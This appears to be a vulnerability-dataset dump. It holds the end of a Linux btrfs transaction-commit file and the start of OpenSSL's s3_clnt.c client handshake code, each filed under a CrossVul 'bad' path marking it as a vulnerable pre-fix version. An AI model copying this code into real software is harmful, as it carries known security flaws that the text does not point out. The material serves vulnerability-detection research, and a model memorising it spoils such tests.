ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
ret = btrfs_insert_dir_item(trans, parent_root,
dentry->d_name.name, dentry->d_name.len,
parent_inode, &key,
BTRFS_FT_DIR, index);
/* We have check then name at the beginning, so it is impossible. */
BUG_ON(ret == -EEXIST);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
btrfs_i_size_write(parent_inode, parent_inode->i_size +
dentry->d_name.len * 2);
parent_inode->i_mtime = parent_inode->i_ctime = CURRENT_TIME;
ret = btrfs_update_inode_fallback(trans, parent_root, parent_inode);
if (ret)
btrfs_abort_transaction(trans, root, ret);
fail:
dput(parent);
trans->block_rsv = rsv;
no_free_objectid:
kfree(new_root_item);
root_item_alloc_fail:
btrfs_free_path(path);
path_alloc_fail:
btrfs_block_rsv_release(root, &pending->block_rsv, (u64)-1);
return ret;
}
/*
* create all the snapshots we've scheduled for creation
*/
static noinline int create_pending_snapshots(struct btrfs_trans_handle *trans,
struct btrfs_fs_info *fs_info)
{
struct btrfs_pending_snapshot *pending;
struct list_head *head = &trans->transaction->pending_snapshots;
list_for_each_entry(pending, head, list)
create_pending_snapshot(trans, fs_info, pending);
return 0;
}
static void update_super_roots(struct btrfs_root *root)
{
struct btrfs_root_item *root_item;
struct btrfs_super_block *super;
super = root->fs_info->super_copy;
root_item = &root->fs_info->chunk_root->root_item;
super->chunk_root = root_item->bytenr;
super->chunk_root_generation = root_item->generation;
super->chunk_root_level = root_item->level;
root_item = &root->fs_info->tree_root->root_item;
super->root = root_item->bytenr;
super->generation = root_item->generation;
super->root_level = root_item->level;
if (btrfs_test_opt(root, SPACE_CACHE))
super->cache_generation = root_item->generation;
}
int btrfs_transaction_in_commit(struct btrfs_fs_info *info)
{
int ret = 0;
spin_lock(&info->trans_lock);
if (info->running_transaction)
ret = info->running_transaction->in_commit;
spin_unlock(&info->trans_lock);
return ret;
}
int btrfs_transaction_blocked(struct btrfs_fs_info *info)
{
int ret = 0;
spin_lock(&info->trans_lock);
if (info->running_transaction)
ret = info->running_transaction->blocked;
spin_unlock(&info->trans_lock);
return ret;
}
/*
* wait for the current transaction commit to start and block subsequent
* transaction joins
*/
static void wait_current_trans_commit_start(struct btrfs_root *root,
struct btrfs_transaction *trans)
{
wait_event(root->fs_info->transaction_blocked_wait, trans->in_commit);
}
/*
* wait for the current transaction to start and then become unblocked.
* caller holds ref.
*/
static void wait_current_trans_commit_start_and_unblock(struct btrfs_root *root,
struct btrfs_transaction *trans)
{
wait_event(root->fs_info->transaction_wait,
trans->commit_done || (trans->in_commit && !trans->blocked));
}
/*
* commit transactions asynchronously. once btrfs_commit_transaction_async
* returns, any subsequent transaction will not be allowed to join.
*/
struct btrfs_async_commit {
struct btrfs_trans_handle *newtrans;
struct btrfs_root *root;
struct delayed_work work;
};
static void do_async_commit(struct work_struct *work)
{
struct btrfs_async_commit *ac =
container_of(work, struct btrfs_async_commit, work.work);
/*
* We've got freeze protection passed with the transaction.
* Tell lockdep about it.
*/
if (ac->newtrans->type < TRANS_JOIN_NOLOCK)
rwsem_acquire_read(
&ac->root->fs_info->sb->s_writers.lock_map[SB_FREEZE_FS-1],
0, 1, _THIS_IP_);
current->journal_info = ac->newtrans;
btrfs_commit_transaction(ac->newtrans, ac->root);
kfree(ac);
}
int btrfs_commit_transaction_async(struct btrfs_trans_handle *trans,
struct btrfs_root *root,
int wait_for_unblock)
{
struct btrfs_async_commit *ac;
struct btrfs_transaction *cur_trans;
ac = kmalloc(sizeof(*ac), GFP_NOFS);
if (!ac)
return -ENOMEM;
INIT_DELAYED_WORK(&ac->work, do_async_commit);
ac->root = root;
ac->newtrans = btrfs_join_transaction(root);
if (IS_ERR(ac->newtrans)) {
int err = PTR_ERR(ac->newtrans);
kfree(ac);
return err;
}
/* take transaction reference */
cur_trans = trans->transaction;
atomic_inc(&cur_trans->use_count);
btrfs_end_transaction(trans, root);
/*
* Tell lockdep we've released the freeze rwsem, since the
* async commit thread will be the one to unlock it.
*/
if (trans->type < TRANS_JOIN_NOLOCK)
rwsem_release(
&root->fs_info->sb->s_writers.lock_map[SB_FREEZE_FS-1],
1, _THIS_IP_);
schedule_delayed_work(&ac->work, 0);
/* wait for transaction to start and unblock */
if (wait_for_unblock)
wait_current_trans_commit_start_and_unblock(root, cur_trans);
else
wait_current_trans_commit_start(root, cur_trans);
if (current->journal_info == trans)
current->journal_info = NULL;
put_transaction(cur_trans);
return 0;
}
static void cleanup_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root, int err)
{
struct btrfs_transaction *cur_trans = trans->transaction;
WARN_ON(trans->use_count > 1);
btrfs_abort_transaction(trans, root, err);
spin_lock(&root->fs_info->trans_lock);
list_del_init(&cur_trans->list);
if (cur_trans == root->fs_info->running_transaction) {
root->fs_info->running_transaction = NULL;
root->fs_info->trans_no_join = 0;
}
spin_unlock(&root->fs_info->trans_lock);
btrfs_cleanup_one_transaction(trans->transaction, root);
put_transaction(cur_trans);
put_transaction(cur_trans);
trace_btrfs_transaction_commit(root);
btrfs_scrub_continue(root);
if (current->journal_info == trans)
current->journal_info = NULL;
kmem_cache_free(btrfs_trans_handle_cachep, trans);
}
static int btrfs_flush_all_pending_stuffs(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int flush_on_commit = btrfs_test_opt(root, FLUSHONCOMMIT);
int snap_pending = 0;
int ret;
if (!flush_on_commit) {
spin_lock(&root->fs_info->trans_lock);
if (!list_empty(&trans->transaction->pending_snapshots))
snap_pending = 1;
spin_unlock(&root->fs_info->trans_lock);
}
if (flush_on_commit || snap_pending) {
btrfs_start_delalloc_inodes(root, 1);
btrfs_wait_ordered_extents(root, 1);
}
ret = btrfs_run_delayed_items(trans, root);
if (ret)
return ret;
/*
* running the delayed items may have added new refs. account
* them now so that they hinder processing of more delayed refs
* as little as possible.
*/
btrfs_delayed_refs_qgroup_accounting(trans, root->fs_info);
/*
* rename don't use btrfs_join_transaction, so, once we
* set the transaction to blocked above, we aren't going
* to get any new ordered operations. We can safely run
* it here and no for sure that nothing new will be added
* to the list
*/
btrfs_run_ordered_operations(root, 1);
return 0;
}
/*
* btrfs_transaction state sequence:
* in_commit = 0, blocked = 0 (initial)
* in_commit = 1, blocked = 1
* blocked = 0
* commit_done = 1
*/
int btrfs_commit_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
unsigned long joined = 0;
struct btrfs_transaction *cur_trans = trans->transaction;
struct btrfs_transaction *prev_trans = NULL;
DEFINE_WAIT(wait);
int ret;
int should_grow = 0;
unsigned long now = get_seconds();
ret = btrfs_run_ordered_operations(root, 0);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto cleanup_transaction;
}
if (cur_trans->aborted) {
ret = cur_trans->aborted;
goto cleanup_transaction;
}
/* make a pass through all the delayed refs we have so far
* any runnings procs may add more while we are here
*/
ret = btrfs_run_delayed_refs(trans, root, 0);
if (ret)
goto cleanup_transaction;
btrfs_trans_release_metadata(trans, root);
trans->block_rsv = NULL;
cur_trans = trans->transaction;
/*
* set the flushing flag so procs in this transaction have to
* start sending their work down.
*/
cur_trans->delayed_refs.flushing = 1;
if (!list_empty(&trans->new_bgs))
btrfs_create_pending_block_groups(trans, root);
ret = btrfs_run_delayed_refs(trans, root, 0);
if (ret)
goto cleanup_transaction;
spin_lock(&cur_trans->commit_lock);
if (cur_trans->in_commit) {
spin_unlock(&cur_trans->commit_lock);
atomic_inc(&cur_trans->use_count);
ret = btrfs_end_transaction(trans, root);
wait_for_commit(root, cur_trans);
put_transaction(cur_trans);
return ret;
}
trans->transaction->in_commit = 1;
trans->transaction->blocked = 1;
spin_unlock(&cur_trans->commit_lock);
wake_up(&root->fs_info->transaction_blocked_wait);
spin_lock(&root->fs_info->trans_lock);
if (cur_trans->list.prev != &root->fs_info->trans_list) {
prev_trans = list_entry(cur_trans->list.prev,
struct btrfs_transaction, list);
if (!prev_trans->commit_done) {
atomic_inc(&prev_trans->use_count);
spin_unlock(&root->fs_info->trans_lock);
wait_for_commit(root, prev_trans);
put_transaction(prev_trans);
} else {
spin_unlock(&root->fs_info->trans_lock);
}
} else {
spin_unlock(&root->fs_info->trans_lock);
}
if (!btrfs_test_opt(root, SSD) &&
(now < cur_trans->start_time || now - cur_trans->start_time < 1))
should_grow = 1;
do {
joined = cur_trans->num_joined;
WARN_ON(cur_trans != trans->transaction);
ret = btrfs_flush_all_pending_stuffs(trans, root);
if (ret)
goto cleanup_transaction;
prepare_to_wait(&cur_trans->writer_wait, &wait,
TASK_UNINTERRUPTIBLE);
if (atomic_read(&cur_trans->num_writers) > 1)
schedule_timeout(MAX_SCHEDULE_TIMEOUT);
else if (should_grow)
schedule_timeout(1);
finish_wait(&cur_trans->writer_wait, &wait);
} while (atomic_read(&cur_trans->num_writers) > 1 ||
(should_grow && cur_trans->num_joined != joined));
ret = btrfs_flush_all_pending_stuffs(trans, root);
if (ret)
goto cleanup_transaction;
/*
* Ok now we need to make sure to block out any other joins while we
* commit the transaction. We could have started a join before setting
* no_join so make sure to wait for num_writers to == 1 again.
*/
spin_lock(&root->fs_info->trans_lock);
root->fs_info->trans_no_join = 1;
spin_unlock(&root->fs_info->trans_lock);
wait_event(cur_trans->writer_wait,
atomic_read(&cur_trans->num_writers) == 1);
/*
* the reloc mutex makes sure that we stop
* the balancing code from coming in and moving
* extents around in the middle of the commit
*/
mutex_lock(&root->fs_info->reloc_mutex);
/*
* We needn't worry about the delayed items because we will
* deal with them in create_pending_snapshot(), which is the
* core function of the snapshot creation.
*/
ret = create_pending_snapshots(trans, root->fs_info);
if (ret) {
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
/*
* We insert the dir indexes of the snapshots and update the inode
* of the snapshots' parents after the snapshot creation, so there
* are some delayed items which are not dealt with. Now deal with
* them.
*
* We needn't worry that this operation will corrupt the snapshots,
* because all the tree which are snapshoted will be forced to COW
* the nodes and leaves.
*/
ret = btrfs_run_delayed_items(trans, root);
if (ret) {
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
if (ret) {
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
/*
* make sure none of the code above managed to slip in a
* delayed item
*/
btrfs_assert_delayed_root_empty(root);
WARN_ON(cur_trans != trans->transaction);
btrfs_scrub_pause(root);
/* btrfs_commit_tree_roots is responsible for getting the
* various roots consistent with each other. Every pointer
* in the tree of tree roots has to point to the most up to date
* root for every subvolume and other tree. So, we have to keep
* the tree logging code from jumping in and changing any
* of the trees.
*
* At this point in the commit, there can't be any tree-log
* writers, but a little lower down we drop the trans mutex
* and let new people in. By holding the tree_log_mutex
* from now until after the super is written, we avoid races
* with the tree-log code.
*/
mutex_lock(&root->fs_info->tree_log_mutex);
ret = commit_fs_roots(trans, root);
if (ret) {
mutex_unlock(&root->fs_info->tree_log_mutex);
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
/* commit_fs_roots gets rid of all the tree log roots, it is now
* safe to free the root of tree log roots
*/
btrfs_free_log_root_tree(trans, root->fs_info);
ret = commit_cowonly_roots(trans, root);
if (ret) {
mutex_unlock(&root->fs_info->tree_log_mutex);
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
btrfs_prepare_extent_commit(trans, root);
cur_trans = root->fs_info->running_transaction;
btrfs_set_root_node(&root->fs_info->tree_root->root_item,
root->fs_info->tree_root->node);
switch_commit_root(root->fs_info->tree_root);
btrfs_set_root_node(&root->fs_info->chunk_root->root_item,
root->fs_info->chunk_root->node);
switch_commit_root(root->fs_info->chunk_root);
assert_qgroups_uptodate(trans);
update_super_roots(root);
if (!root->fs_info->log_root_recovering) {
btrfs_set_super_log_root(root->fs_info->super_copy, 0);
btrfs_set_super_log_root_level(root->fs_info->super_copy, 0);
}
memcpy(root->fs_info->super_for_commit, root->fs_info->super_copy,
sizeof(*root->fs_info->super_copy));
trans->transaction->blocked = 0;
spin_lock(&root->fs_info->trans_lock);
root->fs_info->running_transaction = NULL;
root->fs_info->trans_no_join = 0;
spin_unlock(&root->fs_info->trans_lock);
mutex_unlock(&root->fs_info->reloc_mutex);
wake_up(&root->fs_info->transaction_wait);
ret = btrfs_write_and_wait_transaction(trans, root);
if (ret) {
btrfs_error(root->fs_info, ret,
"Error while writing out transaction.");
mutex_unlock(&root->fs_info->tree_log_mutex);
goto cleanup_transaction;
}
ret = write_ctree_super(trans, root, 0);
if (ret) {
mutex_unlock(&root->fs_info->tree_log_mutex);
goto cleanup_transaction;
}
/*
* the super is written, we can safely allow the tree-loggers
* to go about their business
*/
mutex_unlock(&root->fs_info->tree_log_mutex);
btrfs_finish_extent_commit(trans, root);
cur_trans->commit_done = 1;
root->fs_info->last_trans_committed = cur_trans->transid;
wake_up(&cur_trans->commit_wait);
spin_lock(&root->fs_info->trans_lock);
list_del_init(&cur_trans->list);
spin_unlock(&root->fs_info->trans_lock);
put_transaction(cur_trans);
put_transaction(cur_trans);
if (trans->type < TRANS_JOIN_NOLOCK)
sb_end_intwrite(root->fs_info->sb);
trace_btrfs_transaction_commit(root);
btrfs_scrub_continue(root);
if (current->journal_info == trans)
current->journal_info = NULL;
kmem_cache_free(btrfs_trans_handle_cachep, trans);
if (current != root->fs_info->transaction_kthread)
btrfs_run_delayed_iputs(root);
return ret;
cleanup_transaction:
btrfs_trans_release_metadata(trans, root);
trans->block_rsv = NULL;
btrfs_printk(root->fs_info, "Skipping commit of aborted transaction.\n");
// WARN_ON(1);
if (current->journal_info == trans)
current->journal_info = NULL;
cleanup_transaction(trans, root, ret);
return ret;
}
/*
* interface function to delete all the snapshots we have scheduled for deletion
*/
int btrfs_clean_old_snapshots(struct btrfs_root *root)
{
LIST_HEAD(list);
struct btrfs_fs_info *fs_info = root->fs_info;
spin_lock(&fs_info->trans_lock);
list_splice_init(&fs_info->dead_roots, &list);
spin_unlock(&fs_info->trans_lock);
while (!list_empty(&list)) {
int ret;
root = list_entry(list.next, struct btrfs_root, root_list);
list_del(&root->root_list);
btrfs_kill_all_delayed_nodes(root);
if (btrfs_header_backref_rev(root->node) <
BTRFS_MIXED_BACKREF_REV)
ret = btrfs_drop_snapshot(root, NULL, 0, 0);
else
ret =btrfs_drop_snapshot(root, NULL, 1, 0);
BUG_ON(ret < 0);
}
return 0;
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_3783_4 |
crossvul-cpp_data_bad_2152_1 | /* ssl/s3_clnt.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
/* ====================================================================
* Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* 3. All advertising materials mentioning features or use of this
* software must display the following acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
*
* 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
* endorse or promote products derived from this software without
* prior written permission. For written permission, please contact
* openssl-core@openssl.org.
*
* 5. Products derived from this software may not be called "OpenSSL"
* nor may "OpenSSL" appear in their names without prior written
* permission of the OpenSSL Project.
*
* 6. Redistributions of any form whatsoever must retain the following
* acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit (http://www.openssl.org/)"
*
* THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
* EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR
* ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
* ====================================================================
*
* This product includes cryptographic software written by Eric Young
* (eay@cryptsoft.com). This product includes software written by Tim
* Hudson (tjh@cryptsoft.com).
*
*/
/* ====================================================================
* Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
*
* Portions of the attached software ("Contribution") are developed by
* SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
*
* The Contribution is licensed pursuant to the OpenSSL open source
* license provided above.
*
* ECC cipher suite support in OpenSSL originally written by
* Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
*
*/
/* ====================================================================
* Copyright 2005 Nokia. All rights reserved.
*
* The portions of the attached software ("Contribution") is developed by
* Nokia Corporation and is licensed pursuant to the OpenSSL open source
* license.
*
* The Contribution, originally written by Mika Kousa and Pasi Eronen of
* Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
* support (see RFC 4279) to OpenSSL.
*
* No patent licenses or other rights except those expressly stated in
* the OpenSSL open source license shall be deemed granted or received
* expressly, by implication, estoppel, or otherwise.
*
* No assurances are provided by Nokia that the Contribution does not
* infringe the patent or other intellectual property rights of any third
* party or that the license provides you with all the necessary rights
* to make use of the Contribution.
*
* THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
* ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
* SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
* OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
* OTHERWISE.
*/
#include <stdio.h>
#include "ssl_locl.h"
#include "kssl_lcl.h"
#include <openssl/buffer.h>
#include <openssl/rand.h>
#include <openssl/objects.h>
#include <openssl/evp.h>
#include <openssl/md5.h>
#ifndef OPENSSL_NO_DH
#include <openssl/dh.h>
#endif
#include <openssl/bn.h>
#ifndef OPENSSL_NO_ENGINE
#include <openssl/engine.h>
#endif
static int ca_dn_cmp(const X509_NAME * const *a,const X509_NAME * const *b);
#ifndef OPENSSL_NO_SSL3_METHOD
static const SSL_METHOD *ssl3_get_client_method(int ver)
{
if (ver == SSL3_VERSION)
return(SSLv3_client_method());
else
return(NULL);
}
IMPLEMENT_ssl3_meth_func(SSLv3_client_method,
ssl_undefined_function,
ssl3_connect,
ssl3_get_client_method)
#endif
int ssl3_connect(SSL *s)
{
BUF_MEM *buf=NULL;
unsigned long Time=(unsigned long)time(NULL);
void (*cb)(const SSL *ssl,int type,int val)=NULL;
int ret= -1;
int new_state,state,skip=0;
RAND_add(&Time,sizeof(Time),0);
ERR_clear_error();
clear_sys_error();
if (s->info_callback != NULL)
cb=s->info_callback;
else if (s->ctx->info_callback != NULL)
cb=s->ctx->info_callback;
s->in_handshake++;
if (!SSL_in_init(s) || SSL_in_before(s)) SSL_clear(s);
#ifndef OPENSSL_NO_HEARTBEATS
/* If we're awaiting a HeartbeatResponse, pretend we
* already got and don't await it anymore, because
* Heartbeats don't make sense during handshakes anyway.
*/
if (s->tlsext_hb_pending)
{
s->tlsext_hb_pending = 0;
s->tlsext_hb_seq++;
}
#endif
for (;;)
{
state=s->state;
switch(s->state)
{
case SSL_ST_RENEGOTIATE:
s->renegotiate=1;
s->state=SSL_ST_CONNECT;
s->ctx->stats.sess_connect_renegotiate++;
/* break */
case SSL_ST_BEFORE:
case SSL_ST_CONNECT:
case SSL_ST_BEFORE|SSL_ST_CONNECT:
case SSL_ST_OK|SSL_ST_CONNECT:
s->server=0;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_START,1);
if ((s->version & 0xff00 ) != 0x0300)
{
SSLerr(SSL_F_SSL3_CONNECT, ERR_R_INTERNAL_ERROR);
ret = -1;
goto end;
}
if (!ssl_security(s, SSL_SECOP_VERSION, 0,
s->version, NULL))
{
SSLerr(SSL_F_SSL3_CONNECT, SSL_R_VERSION_TOO_LOW);
return -1;
}
/* s->version=SSL3_VERSION; */
s->type=SSL_ST_CONNECT;
if (s->init_buf == NULL)
{
if ((buf=BUF_MEM_new()) == NULL)
{
ret= -1;
goto end;
}
if (!BUF_MEM_grow(buf,SSL3_RT_MAX_PLAIN_LENGTH))
{
ret= -1;
goto end;
}
s->init_buf=buf;
buf=NULL;
}
if (!ssl3_setup_buffers(s)) { ret= -1; goto end; }
/* setup buffing BIO */
if (!ssl_init_wbio_buffer(s,0)) { ret= -1; goto end; }
/* don't push the buffering BIO quite yet */
ssl3_init_finished_mac(s);
s->state=SSL3_ST_CW_CLNT_HELLO_A;
s->ctx->stats.sess_connect++;
s->init_num=0;
s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
/* Should have been reset by ssl3_get_finished, too. */
s->s3->change_cipher_spec = 0;
break;
case SSL3_ST_CW_CLNT_HELLO_A:
case SSL3_ST_CW_CLNT_HELLO_B:
s->shutdown=0;
ret=ssl3_client_hello(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_SRVR_HELLO_A;
s->init_num=0;
/* turn on buffering for the next lot of output */
if (s->bbio != s->wbio)
s->wbio=BIO_push(s->bbio,s->wbio);
break;
case SSL3_ST_CR_SRVR_HELLO_A:
case SSL3_ST_CR_SRVR_HELLO_B:
ret=ssl3_get_server_hello(s);
if (ret <= 0) goto end;
if (s->hit)
{
s->state=SSL3_ST_CR_FINISHED_A;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_ticket_expected)
{
/* receive renewed session ticket */
s->state=SSL3_ST_CR_SESSION_TICKET_A;
}
#endif
}
else
{
s->state=SSL3_ST_CR_CERT_A;
}
s->init_num=0;
break;
case SSL3_ST_CR_CERT_A:
case SSL3_ST_CR_CERT_B:
/* Check if it is anon DH/ECDH, SRP auth */
/* or PSK */
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aSRP)) &&
!(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
ret=ssl3_get_server_certificate(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_status_expected)
s->state=SSL3_ST_CR_CERT_STATUS_A;
else
s->state=SSL3_ST_CR_KEY_EXCH_A;
}
else
{
skip = 1;
s->state=SSL3_ST_CR_KEY_EXCH_A;
}
#else
}
else
skip=1;
s->state=SSL3_ST_CR_KEY_EXCH_A;
#endif
s->init_num=0;
break;
case SSL3_ST_CR_KEY_EXCH_A:
case SSL3_ST_CR_KEY_EXCH_B:
ret=ssl3_get_key_exchange(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_CERT_REQ_A;
s->init_num=0;
/* at this point we check that we have the
* required stuff from the server */
if (!ssl3_check_cert_and_algorithm(s))
{
ret= -1;
goto end;
}
break;
case SSL3_ST_CR_CERT_REQ_A:
case SSL3_ST_CR_CERT_REQ_B:
ret=ssl3_get_certificate_request(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_SRVR_DONE_A;
s->init_num=0;
break;
case SSL3_ST_CR_SRVR_DONE_A:
case SSL3_ST_CR_SRVR_DONE_B:
ret=ssl3_get_server_done(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_SRP
if (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP)
{
if ((ret = SRP_Calc_A_param(s))<=0)
{
SSLerr(SSL_F_SSL3_CONNECT,SSL_R_SRP_A_CALC);
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_INTERNAL_ERROR);
goto end;
}
}
#endif
if (s->s3->tmp.cert_req)
s->state=SSL3_ST_CW_CERT_A;
else
s->state=SSL3_ST_CW_KEY_EXCH_A;
s->init_num=0;
break;
case SSL3_ST_CW_CERT_A:
case SSL3_ST_CW_CERT_B:
case SSL3_ST_CW_CERT_C:
case SSL3_ST_CW_CERT_D:
ret=ssl3_send_client_certificate(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CW_KEY_EXCH_A;
s->init_num=0;
break;
case SSL3_ST_CW_KEY_EXCH_A:
case SSL3_ST_CW_KEY_EXCH_B:
ret=ssl3_send_client_key_exchange(s);
if (ret <= 0) goto end;
/* EAY EAY EAY need to check for DH fix cert
* sent back */
/* For TLS, cert_req is set to 2, so a cert chain
* of nothing is sent, but no verify packet is sent */
/* XXX: For now, we do not support client
* authentication in ECDH cipher suites with
* ECDH (rather than ECDSA) certificates.
* We need to skip the certificate verify
* message when client's ECDH public key is sent
* inside the client certificate.
*/
if (s->s3->tmp.cert_req == 1)
{
s->state=SSL3_ST_CW_CERT_VRFY_A;
}
else
{
s->state=SSL3_ST_CW_CHANGE_A;
}
if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY)
{
s->state=SSL3_ST_CW_CHANGE_A;
}
s->init_num=0;
break;
case SSL3_ST_CW_CERT_VRFY_A:
case SSL3_ST_CW_CERT_VRFY_B:
ret=ssl3_send_client_verify(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CW_CHANGE_A;
s->init_num=0;
break;
case SSL3_ST_CW_CHANGE_A:
case SSL3_ST_CW_CHANGE_B:
ret=ssl3_send_change_cipher_spec(s,
SSL3_ST_CW_CHANGE_A,SSL3_ST_CW_CHANGE_B);
if (ret <= 0) goto end;
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_CW_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_CW_NEXT_PROTO_A;
else
s->state=SSL3_ST_CW_FINISHED_A;
#endif
s->init_num=0;
s->session->cipher=s->s3->tmp.new_cipher;
#ifdef OPENSSL_NO_COMP
s->session->compress_meth=0;
#else
if (s->s3->tmp.new_compression == NULL)
s->session->compress_meth=0;
else
s->session->compress_meth=
s->s3->tmp.new_compression->id;
#endif
if (!s->method->ssl3_enc->setup_key_block(s))
{
ret= -1;
goto end;
}
if (!s->method->ssl3_enc->change_cipher_state(s,
SSL3_CHANGE_CIPHER_CLIENT_WRITE))
{
ret= -1;
goto end;
}
break;
#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
case SSL3_ST_CW_NEXT_PROTO_A:
case SSL3_ST_CW_NEXT_PROTO_B:
ret=ssl3_send_next_proto(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CW_FINISHED_A;
break;
#endif
case SSL3_ST_CW_FINISHED_A:
case SSL3_ST_CW_FINISHED_B:
ret=ssl3_send_finished(s,
